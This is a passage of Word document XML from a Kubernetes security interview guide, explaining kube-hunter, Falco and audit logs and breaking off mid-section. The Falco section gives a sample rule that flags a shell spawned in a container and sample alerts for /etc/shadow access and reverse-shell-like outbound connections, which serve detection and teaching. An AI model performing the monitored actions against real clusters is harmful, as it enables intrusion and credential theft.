        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>kube-bench vs kube-hunter</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kube-bench</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kube-hunter</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Type</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Configuration audit</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Security penetration testing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Focus</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Compliance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Vulnerability discovery</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Approach</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Static checks</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Active probing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Output</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pass/Fail reports</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Attack surface analysis</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes cluster = building</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * kube-bench = safety inspector checking if building follows fire safety rules and regulations</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Helps enforce security standards</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Easy compliance reporting</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Identifies weak configurations early</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Works across cloud and on-prem clusters</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Does NOT fix issues automatically</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Requires manual remediation</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Focuses only on CIS benchmarks</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Needs regular execution for continuous compliance</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Run kube-bench regularly (CI/CD or scheduled jobs)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Fix high-severity findings immediately</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Combine with runtime security tools (Falco, etc.)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Use alongside RBAC and Pod Security Standards</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>kube-bench is an open-source security auditing tool that checks whether a Kubernetes cluster complies with CIS Kubernetes Benchmark guidelines by analyzing control plane and node configurations and reporting misconfigurations to help improve cluster security posture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q330. Explain kube-hunter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: kube-hunter is an open-source security tool that actively scans and tests a cluster running Kubernetes to discover security vulnerabilities by simulating real-world attacks.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>kube-hunter behaves like a “hacker simulation tool” that probes your Kubernetes cluster to find weak points.</w:t>
        <w:br/>
        <w:t>Unlike audit tools, it is active and offensive in nature.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why kube-hunter is used</w:t>
        <w:br/>
        <w:t>It helps you:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Detect exposed Kubernetes components</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Identify misconfigurations</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Find attack surfaces before attackers do</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Strengthen cluster security posture</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Validate production readiness</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What kube-hunter checks</w:t>
        <w:br/>
        <w:t>1. API server exposure</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Open Kubernetes API endpoints</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Anonymous access enabled</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Node vulnerabilities</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Open kubelet ports</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Unprotected dashboards</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Misconfigurations</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Weak RBAC rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Privileged containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Insecure etcd access</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Network exposure</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Services exposed publicly</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Insecure ingress setups</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How kube-hunter works</w:t>
        <w:br/>
        <w:t>kube-hunter → scans network + cluster endpoints → performs security probes → reports vulnerabilities</w:t>
        <w:br/>
        <w:t>It behaves like an attacker:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Sends requests to Kubernetes APIs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Tries to access sensitive endpoints</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Detects insecure configurations</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Modes of operation</w:t>
        <w:br/>
        <w:t>1. Remote mode</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Runs from outside the cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Scans public IPs or endpoints</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Pod mode</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Runs inside the cluster as a Pod</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Finds internal vulnerabilities</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Interface mode</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Interactive CLI scanning tool</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example output</w:t>
        <w:br/>
        <w:t>[HIGH] API Server allows anonymous requests</w:t>
        <w:br/>
        <w:t>[MEDIUM] Kubelet port 10250 is publicly accessible</w:t>
        <w:br/>
        <w:t>[LOW] Dashboard is exposed without authentication</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>kube-hunter vs kube-bench</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kube-hunter</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kube-bench</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Type</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Active penetration testing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Configuration audit</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Approach</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Simulates attacks</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Checks CIS compliance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Goal</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Find vulnerabilities</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Ensure best practices</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Style</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Offensive</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Defensive</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Output</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Attack surface report</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Compliance report</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes cluster = building</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * kube-bench = safety inspector checking building codes</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * kube-hunter = ethical hacker trying to break into the building</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Identifies real attack paths</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Helps improve security posture</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Detects misconfigurations missed by audits</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Useful for penetration testing</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Works in CI/CD security pipelines</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Can generate false positives</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Requires security expertise to interpret results</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Does not automatically fix issues</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * May be intrusive if run in production without caution</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Run in staging environments first</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Combine with kube-bench for full coverage</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Fix high-severity findings immediately</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Restrict API exposure before running</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Use as part of DevSecOps pipeline</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-world use cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes penetration testing</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Security assessments before production deployment</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Compliance validation</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cloud security audits</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Red team exercises</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>kube-hunter is an open-source Kubernetes security testing tool that actively scans a cluster by simulating attacker behavior to identify vulnerabilities, misconfigurations, and exposed services, helping organizations discover and fix security risks in their Kubernetes environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q331. What is Falco?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Falco is an open-source runtime security tool for Kubernetes that detects abnormal behavior and potential security threats in real time by monitoring system calls and container activity.</w:t>
        <w:br/>
        <w:t>It is widely used in DevSecOps for runtime threat detection.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Falco is a “security guard” that watches what is happening inside your Kubernetes nodes and containers in real time.</w:t>
        <w:br/>
        <w:t>It detects suspicious activity and raises alerts.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Falco is used</w:t>
        <w:br/>
        <w:t>It helps to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Detect container runtime attacks</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Identify suspicious system calls</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Monitor Kubernetes API activity</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Catch privilege escalation attempts</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Provide real-time security alerts</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What Falco monitors</w:t>
        <w:br/>
        <w:t>1. System calls (kernel-level)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * File access</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Process execution</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Network connections</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Privilege changes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Container behavior</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Unexpected shell access</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cryptomining activity</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Sensitive file modifications</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reverse shells</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Kubernetes activity</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pod creation/deletion</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * RBAC anomalies</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * API server interactions</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How Falco works</w:t>
        <w:br/>
        <w:t>Kernel (syscalls) → Falco Engine → Rules Engine → Alerts → Output (logs/Slack/SIEM)</w:t>
        <w:br/>
        <w:t>It uses:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * eBPF or kernel modules (depending on setup)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Rule-based detection engine</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example rule behavior</w:t>
        <w:br/>
        <w:t>Rule: Detect shell in container</w:t>
        <w:br/>
        <w:t>If someone runs:</w:t>
        <w:br/>
        <w:t>kubectl exec -it pod -- /bin/bash</w:t>
        <w:br/>
        <w:t>Falco may trigger:</w:t>
        <w:br/>
        <w:t>ALERT: Shell spawned in container nginx-pod</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example alerts</w:t>
        <w:br/>
        <w:t>1. Privilege escalation</w:t>
        <w:br/>
        <w:t>Detected container running as root user</w:t>
        <w:br/>
        <w:t>2. Sensitive file access</w:t>
        <w:br/>
        <w:t>File /etc/shadow accessed inside container</w:t>
        <w:br/>
        <w:t>3. Suspicious network activity</w:t>
        <w:br/>
        <w:t>Outbound connection to unknown IP from container</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How rules are defined</w:t>
        <w:br/>
        <w:t>Falco uses YAML-based rules:</w:t>
        <w:br/>
        <w:t>- rule: Unauthorized Shell</w:t>
        <w:br/>
        <w:t xml:space="preserve">  condition: container and proc.name = bash</w:t>
        <w:br/>
        <w:t xml:space="preserve">  output: "Shell spawned in container"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  priority: WARNING</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Falco deployment</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Runs as DaemonSet in Kubernetes</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * One instance per node</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Monitors all container activity on that node</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Output destinations</w:t>
        <w:br/>
        <w:t>Falco alerts can be sent to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Logs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Prometheus</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Slack / Teams</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * SIEM tools (Splunk, ELK)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cloud monitoring systems</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Falco vs kube-bench vs kube-hunter</w:t>
        <w:br/>
        <w:t>Tool</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Type</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Falco</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runtime security</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Detect live attacks</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kube-bench</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Compliance audit</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Check CIS configs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kube-hunter</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pen testing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Simulate attacks</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes cluster = office building</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Falco = security camera system that watches every action in real time and alerts suspicious behavior immediately</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Real-time threat detection</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Deep visibility into container activity</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Works at kernel level (high accuracy)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Integrates with security pipelines</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Detects zero-day behaviors (behavior-based)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Can generate false positives if rules are too strict</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Requires tuning for production environments</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Adds overhead at node level</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Needs integration with alerting systems for value</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Start with default ruleset and tune gradually</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Integrate with SIEM or alerting tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Run in all production nodes (DaemonSet)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Regularly update rule definitions</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Combine with kube-bench and OPA Gatekeeper</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Falco is an open-source runtime security tool for Kubernetes that monitors system calls and container behavior at the kernel level to detect suspicious or malicious activity in real time and generate alerts, enabling proactive threat detection and runtime security enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q332. Explain Kubernetes audit logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Kubernetes Audit Logs in Kubernetes are a record of all requests made to the Kubernetes API server, capturing who did what, when, and how in the cluster.</w:t>
        <w:br/>
        <w:t>They are mainly used for security, compliance, and troubleshooting.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Audit logs answer: “Who accessed or changed what inside the cluster?”</w:t>
        <w:br/>
        <w:t>They provide a complete history of API activity.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why audit logs are important</w:t>
        <w:br/>
        <w:t>They help you:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Track all cluster activity</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Detect unauthorized access</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Investigate security incidents</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Meet compliance requirements (SOC2, ISO, etc.)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Debug unexpected changes in cluster state</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What is logged?</w:t>
        <w:br/>
        <w:t>Audit logs capture every request to the API server, such as:</w:t>
        <w:br/>
        <w:t>1. Resource operations</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * CREATE Pod</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * UPDATE Deployment</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * DELETE Service</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. User actions</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * kubectl commands</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Service account activity</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Controller actions</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Access details</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * User identity</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Namespace</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * IP address</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Timestamp</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Request source</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example audit event</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "kind": "Event",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "verb": "create",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "user": {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "username": "developer1"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "objectRef": {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "resource": "pods",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "namespace": "default"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "sourceIPs": ["10.0.0.5"],</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "responseStatus": {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "code": 201</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Kubernetes audit log levels</w:t>
        <w:br/>
        <w:t>Kubernetes allows different levels of logging:</w:t>
        <w:br/>
        <w:t>1. None</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * No logging</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Metadata</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Logs request metadata only (user, resource, timestamp)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Request</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Logs metadata + request body</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. RequestResponse (most detailed)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Logs full request and response body</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Highest verbosity (use carefully)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Audit logging flow</w:t>
        <w:br/>
        <w:t>kubectl → API Server → Audit Policy → Audit Backend (file/SIEM/log system)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * API server evaluates audit policy</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Logs are written based on rules</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Audit policy example</w:t>
        <w:br/>
        <w:t>apiVersion: audit.k8s.io/v1</w:t>
        <w:br/>
        <w:t>kind: Policy</w:t>
        <w:br/>
        <w:t>rules:</w:t>
        <w:br/>
        <w:t>- level: Metadata</w:t>
        <w:br/>
        <w:t xml:space="preserve">  resources:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - group: ""</w:t>
        <w:br/>
        <w:t xml:space="preserve">    resources: ["pods"]</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>- level: RequestResponse</w:t>
        <w:br/>
        <w:t xml:space="preserve">  verbs: ["create", "delete"]</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Where audit logs are stored</w:t>
        <w:br/>
        <w:t>Audit logs can be sent to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * File system on control plane</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Logging systems (ELK, Splunk)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cloud logging (CloudWatch, Stackdriver, Azure Monitor)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Use cases</w:t>
        <w:br/>
        <w:t>1. Security monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Detect suspicious API activity</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Identify unauthorized changes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Compliance auditing</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Track all access to sensitive resources</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Required for regulatory compliance</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Incident investigation</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Find who deleted a critical Pod</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Trace configuration changes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Change tracking</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Monitor infrastructure changes over time</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Audit logs vs other logs</w:t>
        <w:br/>
        <w:t>Type</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Focus</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Audit logs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>API server actions</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Application logs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>App output</w:t>
        <w:br/>
        <w:tab/>
        <w:t>System logs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Node/Kubelet activity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Events</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cluster runtime events</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes cluster = secure office building</w:t>
        <w:br/>
